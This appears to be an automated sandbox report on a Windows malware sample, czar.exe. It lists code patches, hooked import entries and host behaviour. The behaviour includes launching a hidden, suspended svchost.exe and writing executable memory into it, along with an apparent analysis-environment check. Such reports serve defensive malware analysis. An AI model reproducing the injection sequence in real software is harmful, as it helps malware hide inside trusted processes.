Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x112a	13 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x113a	6 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1143	7 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x114b	20 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1160	17 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1172	19 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1186	6 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x118d	6 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x1194	13 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x11a2	8 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x11ab	5 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x11b1	17 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
Code	private_0x0000000009320000:+0x13a34	czar.exe:+0x11c3	65 bytes	-	... Actions Go to Installer Region Go to Target Region Show Code Modification
IAT	private_0x0000000009320000:+0x13a14	1. entry of czar.exe	4 bytes	kernel32.dll:GetCommandLineW+0x0 now points to pagefile_0x0000000000010000:+0x387c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	2. entry of czar.exe	4 bytes	kernel32.dll:DosDateTimeToFileTime+0x0 now points to pagefile_0x0000000000010000:+0x3866	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	3. entry of czar.exe	4 bytes	kernel32.dll:GetCommModemStatus+0x0 now points to pagefile_0x0000000000010000:+0x3852	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	4. entry of czar.exe	4 bytes	kernel32.dll:lstrcmpA+0x0 now points to pagefile_0x0000000000010000:+0x3896	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	6. entry of czar.exe	4 bytes	kernel32.dll:SetFilePointer+0x0 now points to pagefile_0x0000000000010000:+0x357c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	7. entry of czar.exe	4 bytes	kernel32.dll:FindResourceExW+0x0 now points to pagefile_0x0000000000010000:+0x358c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	8. entry of czar.exe	4 bytes	kernel32.dll:SetErrorMode+0x0 now points to pagefile_0x0000000000010000:+0x359e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	9. entry of czar.exe	4 bytes	ntdll.dll:VerSetConditionMask+0x0 now points to pagefile_0x0000000000010000:+0x35b0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	10. entry of czar.exe	4 bytes	kernel32.dll:ScrollConsoleScreenBufferW+0x0 now points to pagefile_0x0000000000010000:+0x35c6	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	11. entry of czar.exe	4 bytes	kernel32.dll:SetConsoleScreenBufferSize+0x0 now points to pagefile_0x0000000000010000:+0x35da	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	12. entry of czar.exe	4 bytes	kernel32.dll:GetTimeFormatA+0x0 now points to pagefile_0x0000000000010000:+0x35f0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	13. entry of czar.exe	4 bytes	kernel32.dll:LoadLibraryW+0x0 now points to pagefile_0x0000000000010000:+0x3604	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	14. entry of czar.exe	4 bytes	kernel32.dll:GetSystemPowerStatus+0x0 now points to pagefile_0x0000000000010000:+0x3612	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	15. entry of czar.exe	4 bytes	kernel32.dll:SetSystemTimeAdjustment+0x0 now points to pagefile_0x0000000000010000:+0x3620	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	16. entry of czar.exe	4 bytes	kernel32.dll:GetStringTypeExW+0x0 now points to pagefile_0x0000000000010000:+0x3628	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	17. entry of czar.exe	4 bytes	kernel32.dll:GetCPInfoExW+0x0 now points to pagefile_0x0000000000010000:+0x363c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	18. entry of czar.exe	4 bytes	kernel32.dll:GetProcAddress+0x0 now points to pagefile_0x0000000000010000:+0x3652	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	19. entry of czar.exe	4 bytes	kernel32.dll:DisableThreadLibraryCalls+0x0 now points to pagefile_0x0000000000010000:+0x3668	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	20. entry of czar.exe	4 bytes	kernel32.dll:GetExitCodeThread+0x0 now points to pagefile_0x0000000000010000:+0x3676	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	21. entry of czar.exe	4 bytes	kernel32.dll:GetModuleHandleA+0x0 now points to pagefile_0x0000000000010000:+0x3682	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	22. entry of czar.exe	4 bytes	kernel32.dll:_lopen+0x0 now points to pagefile_0x0000000000010000:+0x3698	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	23. entry of czar.exe	4 bytes	kernel32.dll:TlsAlloc+0x0 now points to pagefile_0x0000000000010000:+0x36a8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	24. entry of czar.exe	4 bytes	kernel32.dll:EnumSystemLocalesW+0x0 now points to pagefile_0x0000000000010000:+0x36ba	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	25. entry of czar.exe	4 bytes	kernel32.dll:lstrcpyA+0x0 now points to pagefile_0x0000000000010000:+0x36ca	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	26. entry of czar.exe	4 bytes	kernel32.dll:FlushFileBuffers+0x0 now points to pagefile_0x0000000000010000:+0x356e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	27. entry of czar.exe	4 bytes	kernel32.dll:CloseHandle+0x0 now points to pagefile_0x0000000000010000:+0x36f0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	28. entry of czar.exe	4 bytes	kernel32.dll:CreateFileW+0x0 now points to pagefile_0x0000000000010000:+0x36fe	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	29. entry of czar.exe	4 bytes	ntdll.dll:RtlReAllocateHeap+0x0 now points to pagefile_0x0000000000010000:+0x3710	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	30. entry of czar.exe	4 bytes	kernel32.dll:GetStringTypeW+0x0 now points to pagefile_0x0000000000010000:+0x3726	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	31. entry of czar.exe	4 bytes	kernel32.dll:LCMapStringW+0x0 now points to pagefile_0x0000000000010000:+0x3738	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	32. entry of czar.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000010000:+0x3744	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	33. entry of czar.exe	4 bytes	kernel32.dll:WriteConsoleW+0x0 now points to pagefile_0x0000000000010000:+0x3758	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	34. entry of czar.exe	4 bytes	kernel32.dll:HeapSetInformation+0x0 now points to pagefile_0x0000000000010000:+0x3764	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	35. entry of czar.exe	4 bytes	kernel32.dll:GetStartupInfoW+0x0 now points to pagefile_0x0000000000010000:+0x3780	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	36. entry of czar.exe	4 bytes	kernel32.dll:RaiseException+0x0 now points to pagefile_0x0000000000010000:+0x378e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	37. entry of czar.exe	4 bytes	ntdll.dll:RtlDecodePointer+0x0 now points to pagefile_0x0000000000010000:+0x37a6	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	38. entry of czar.exe	4 bytes	kernel32.dll:UnhandledExceptionFilter+0x0 now points to pagefile_0x0000000000010000:+0x37bc	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	39. entry of czar.exe	4 bytes	kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to pagefile_0x0000000000010000:+0x37c8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	40. entry of czar.exe	4 bytes	kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x0000000000010000:+0x37d8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	41. entry of czar.exe	4 bytes	ntdll.dll:RtlEncodePointer+0x0 now points to pagefile_0x0000000000010000:+0x3ce4	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	42. entry of czar.exe	4 bytes	kernel32.dll:TerminateProcess+0x0 now points to pagefile_0x0000000000010000:+0x3cd4	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	43. entry of czar.exe	4 bytes	kernel32.dll:GetCurrentProcess+0x0 now points to pagefile_0x0000000000010000:+0x3cc2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	44. entry of czar.exe	4 bytes	ntdll.dll:RtlAllocateHeap+0x0 now points to pagefile_0x0000000000010000:+0x3cb2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	45. entry of czar.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x3ca2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	46. entry of czar.exe	4 bytes	kernel32.dll:HeapFree+0x0 now points to pagefile_0x0000000000010000:+0x3c8e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	47. entry of czar.exe	4 bytes	kernel32.dll:IsProcessorFeaturePresent+0x0 now points to pagefile_0x0000000000010000:+0x3558	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	48. entry of czar.exe	4 bytes	kernel32.dll:GetModuleHandleW+0x0 now points to pagefile_0x0000000000010000:+0x3546	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	49. entry of czar.exe	4 bytes	kernel32.dll:ExitProcess+0x0 now points to pagefile_0x0000000000010000:+0x36de	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	50. entry of czar.exe	4 bytes	kernel32.dll:WriteFile+0x0 now points to pagefile_0x0000000000010000:+0x3530	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	51. entry of czar.exe	4 bytes	kernel32.dll:GetStdHandle+0x0 now points to pagefile_0x0000000000010000:+0x3c7e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	52. entry of czar.exe	4 bytes	kernel32.dll:GetModuleFileNameW+0x0 now points to pagefile_0x0000000000010000:+0x3c6c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	53. entry of czar.exe	4 bytes	kernel32.dll:FreeEnvironmentStringsW+0x0 now points to pagefile_0x0000000000010000:+0x3c5c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	54. entry of czar.exe	4 bytes	kernel32.dll:GetEnvironmentStringsW+0x0 now points to pagefile_0x0000000000010000:+0x3c48	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	55. entry of czar.exe	4 bytes	kernel32.dll:SetHandleCount+0x0 now points to pagefile_0x0000000000010000:+0x38fe	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	56. entry of czar.exe	4 bytes	kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to pagefile_0x0000000000010000:+0x3910	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	57. entry of czar.exe	4 bytes	kernel32.dll:GetFileType+0x0 now points to pagefile_0x0000000000010000:+0x3920	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	58. entry of czar.exe	4 bytes	ntdll.dll:RtlDeleteCriticalSection+0x0 now points to pagefile_0x0000000000010000:+0x3936	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	59. entry of czar.exe	4 bytes	kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x0000000000010000:+0x3946	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	60. entry of czar.exe	4 bytes	kernel32.dll:TlsSetValue+0x0 now points to pagefile_0x0000000000010000:+0x3956	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	61. entry of czar.exe	4 bytes	kernel32.dll:TlsFree+0x0 now points to pagefile_0x0000000000010000:+0x396c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	62. entry of czar.exe	4 bytes	kernel32.dll:InterlockedIncrement+0x0 now points to pagefile_0x0000000000010000:+0x3982	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	63. entry of czar.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to pagefile_0x0000000000010000:+0x3998	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	64. entry of czar.exe	4 bytes	kernel32.dll:GetCurrentThreadId+0x0 now points to pagefile_0x0000000000010000:+0x39aa	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	65. entry of czar.exe	4 bytes	kernel32.dll:InterlockedDecrement+0x0 now points to pagefile_0x0000000000010000:+0x39ba	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	66. entry of czar.exe	4 bytes	kernel32.dll:HeapCreate+0x0 now points to pagefile_0x0000000000010000:+0x39c8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	67. entry of czar.exe	4 bytes	kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000010000:+0x39e0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	68. entry of czar.exe	4 bytes	kernel32.dll:GetTickCount+0x0 now points to pagefile_0x0000000000010000:+0x39f2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	69. entry of czar.exe	4 bytes	kernel32.dll:GetCurrentProcessId+0x0 now points to pagefile_0x0000000000010000:+0x3a08	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	70. entry of czar.exe	4 bytes	kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to pagefile_0x0000000000010000:+0x3a14	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	71. entry of czar.exe	4 bytes	kernel32.dll:WideCharToMultiByte+0x0 now points to pagefile_0x0000000000010000:+0x3a2e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	72. entry of czar.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000010000:+0x3a48	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	73. entry of czar.exe	4 bytes	kernel32.dll:GetConsoleMode+0x0 now points to pagefile_0x0000000000010000:+0x3a62	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	74. entry of czar.exe	4 bytes	ntdll.dll:RtlEnterCriticalSection+0x0 now points to pagefile_0x0000000000010000:+0x3a7c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	75. entry of czar.exe	4 bytes	ntdll.dll:RtlLeaveCriticalSection+0x0 now points to pagefile_0x0000000000010000:+0x3a90	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	76. entry of czar.exe	4 bytes	kernel32.dll:GetCPInfo+0x0 now points to pagefile_0x0000000000010000:+0x3aac	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	77. entry of czar.exe	4 bytes	kernel32.dll:GetACP+0x0 now points to pagefile_0x0000000000010000:+0x3ac8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	78. entry of czar.exe	4 bytes	kernel32.dll:GetOEMCP+0x0 now points to pagefile_0x0000000000010000:+0x3ae6	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	79. entry of czar.exe	4 bytes	kernel32.dll:IsValidCodePage+0x0 now points to pagefile_0x0000000000010000:+0x3b0e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	80. entry of czar.exe	4 bytes	kernel32.dll:Sleep+0x0 now points to pagefile_0x0000000000010000:+0x3b22	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	81. entry of czar.exe	4 bytes	kernel32.dll:RtlUnwind+0x0 now points to pagefile_0x0000000000010000:+0x3b2e	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	82. entry of czar.exe	4 bytes	ntdll.dll:RtlSizeHeap+0x0 now points to pagefile_0x0000000000010000:+0x3b3c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	83. entry of czar.exe	4 bytes	kernel32.dll:SetStdHandle+0x0 now points to pagefile_0x0000000000010000:+0x3b4a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	85. entry of czar.exe	4 bytes	user32.dll:UnregisterClassA+0x0 now points to pagefile_0x0000000000010000:+0x3b68	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	86. entry of czar.exe	4 bytes	user32.dll:SetWindowRgn+0x0 now points to pagefile_0x0000000000010000:+0x3b80	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	87. entry of czar.exe	4 bytes	user32.dll:RealChildWindowFromPoint+0x0 now points to pagefile_0x0000000000010000:+0x3b98	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	88. entry of czar.exe	4 bytes	user32.dll:OpenIcon+0x0 now points to pagefile_0x0000000000010000:+0x3ba4	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	89. entry of czar.exe	4 bytes	user32.dll:OpenDesktopA+0x0 now points to pagefile_0x0000000000010000:+0x3bb6	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	90. entry of czar.exe	4 bytes	user32.dll:GetMessageExtraInfo+0x0 now points to pagefile_0x0000000000010000:+0x3bc0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	91. entry of czar.exe	4 bytes	user32.dll:DrawFocusRect+0x0 now points to pagefile_0x0000000000010000:+0x3bcc	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	92. entry of czar.exe	4 bytes	user32.dll:DdeCreateDataHandle+0x0 now points to pagefile_0x0000000000010000:+0x3bd8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000009320000:+0x13a14	94. entry of czar.exe	4 bytes	ole32.dll:CoQueryClientBlanket+0x0 now points to pagefile_0x0000000000010000:+0x3c00	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (8)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\MalwarebytesLABs	type = file_attributes	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Windows\SysWOW64\svchost.exe	os_pid = 0xa88, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE		1	Fn
Get Info	C:\Windows\SysWOW64\svchost.exe	type = PROCESS_BASIC_INFORMATION		1	Fn

Thread (1)

Operation	Process	Additional Information	Success	Count	Logfile
Resume	c:\users\5p5nrg~1\appdata\local\temp\czar.exe	os_tid = 0xa3c		1	Fn

Memory (8)

Operation	Process	Additional Information	Count	Logfile
Allocate	C:\Windows\SysWOW64\svchost.exe	address = 0x70000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 68096	1	Fn
Protect	C:\Windows\SysWOW64\svchost.exe	address = 0xac2104, protection = PAGE_READWRITE, size = 32	1	Fn
Protect	C:\Windows\SysWOW64\svchost.exe	address = 0xac2104, protection = PAGE_EXECUTE_READ, size = 32	1	Fn
Read	C:\Windows\SysWOW64\svchost.exe	address = 0x7efde008, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe	address = 0x70000, size = 68096	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe	address = 0xac2104, size = 1	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe	address = 0xac2105, size = 4	1	Fn Data
Write	C:\Windows\SysWOW64\svchost.exe	address = 0xac2109, size = 1	1	Fn Data

Module (190)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x75fd0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75fd0000	1	Fn
Load	USER32.dll	base_address = 0x763e0000	3	Fn
Load	ADVAPI32.dll	base_address = 0x760e0000	1	Fn
Load	SHELL32.dll	base_address = 0x76920000	1	Fn
Load	ntdll.dll	base_address = 0x77e30000	1	Fn
Load	msvcr100.dll	base_address = 0x71af0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75fd0000	4	Fn
Get Handle	c:\users\5p5nrg~1\appdata\local\temp\czar.exe	base_address = 0x400000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77e30000	2	Fn
Get Filename	-	process_name = c:\users\5p5nrg~1\appdata\local\temp\czar.exe, file_name_orig = C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe, size = 260	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75fe4f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75fe1252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75fe4208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75fe359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x75fe168c	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x75fe435f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75fe49d7	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75fe1856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75fe186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75fe3519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75ffd802	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MapViewOfFile, address_out = 0x75fe18f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnmapViewOfFile, address_out = 0x75fe1826	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75fe103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VerSetConditionMask, address_out = 0x77ea92b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75fe1809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75fe1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75fe17ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75fe1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75fe10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x75ffcfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75fe1b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75fe4950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75fe3f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75fe1700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VerifyVersionInfoW, address_out = 0x75ffd423	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75fe11c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75fe1222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtectEx, address_out = 0x760645bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75fe7a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsWow64Process, address_out = 0x75fe195e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileMappingW, address_out = 0x75fe1909	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x7600896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x75ffd5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleA, address_out = 0x75fe1245	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7600828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7600735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75fe1410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetWindowsDirectoryW, address_out = 0x75fe43e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75fe11f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75fe2d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ResumeThread, address_out = 0x75fe43ef	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExpandEnvironmentStringsW, address_out = 0x75fe4173	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExW, address_out = 0x75fe1ae5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x75fe7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75fe34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x76007aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x75ffc807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteProcessMemory, address_out = 0x75ffd9e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAllocEx, address_out = 0x75ffd9b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x76008baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateRemoteThread, address_out = 0x7606416b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x7606454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x75fe1328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x76087bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75fe469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x75fe51a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75fe11a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75fe1450	1	Fn
